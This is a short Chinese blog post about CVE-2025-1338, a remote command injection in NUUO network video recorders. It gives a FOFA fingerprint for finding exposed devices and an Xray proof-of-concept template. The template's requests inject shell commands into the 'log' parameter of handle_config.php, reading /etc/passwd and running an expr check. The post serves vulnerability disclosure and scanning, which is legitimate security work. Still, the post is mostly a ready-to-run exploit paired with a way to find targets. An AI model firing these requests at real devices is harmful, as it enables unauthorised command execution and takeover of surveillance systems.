NUUO摄像机handle_config.php远程命令执行CVE-2025-1338

  参考链接:

 https://mp.weixin.qq.com/s/Jg6ngchbn0pwWJ01nkMSEg

漏洞介绍:

 NUUO NVR是中国台湾省NUUO公司旗下的一款网络视频记录器,该设备存在远程命令执行漏洞,攻击者可利用该漏洞执行任意命令,进而获取服务器的权限。

 

资产指纹:

 title="Network Video Recorder Login" || body="www.nuuo.com/eHelpdesk.php"

 Xray-poc:

 

复制代码
name: poc-yaml-nuuo-handleconfig-cve-2025-1338-command-exec
transport: http
set:
  r1: randomInt(8000, 10000)
  r2: randomInt(8000, 10000)
rules:
  r0:
    request:
      method: GET
      path: /handle_config.php?log=;cat%20/etc/passwd;
      follow_redirects: false
      headers:
        Content-Type: application/x-www-form-urlencoded
    expression: >-
      response.status == 200 &&
      "root:.*?:[0-9]*:[0-9]*:".matches(response.body_string)
  r1:
    request:
      method: GET
      path: /handle_config.php?log=;expr%20{{r1}}%20*%20{{r2}};
      follow_redirects: false
      headers:
        Content-Type: application/x-www-form-urlencoded
    expression: >-
      response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
expression: r0() || r1()
detail:
  author: Cysec
  links:
    - https://mp.weixin.qq.com/s/Jg6ngchbn0pwWJ01nkMSEg
  description: NUUO摄像机handle_config.php远程命令执行CVE-2025-1338
  fofakeyword: title="Network Video Recorder Login" || body="www.nuuo.com/eHelpdesk.php"
复制代码

 

posted @   Cysec  阅读(40)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 微软正式发布.NET 10 Preview 1:开启下一代开发框架新篇章
· 没有源码,如何修改代码逻辑?
· PowerShell开发游戏 · 打蜜蜂
· 在鹅厂做java开发是什么体验
· WPF到Web的无缝过渡:英雄联盟客户端的OpenSilver迁移实战
点击右上角即可分享
微信分享提示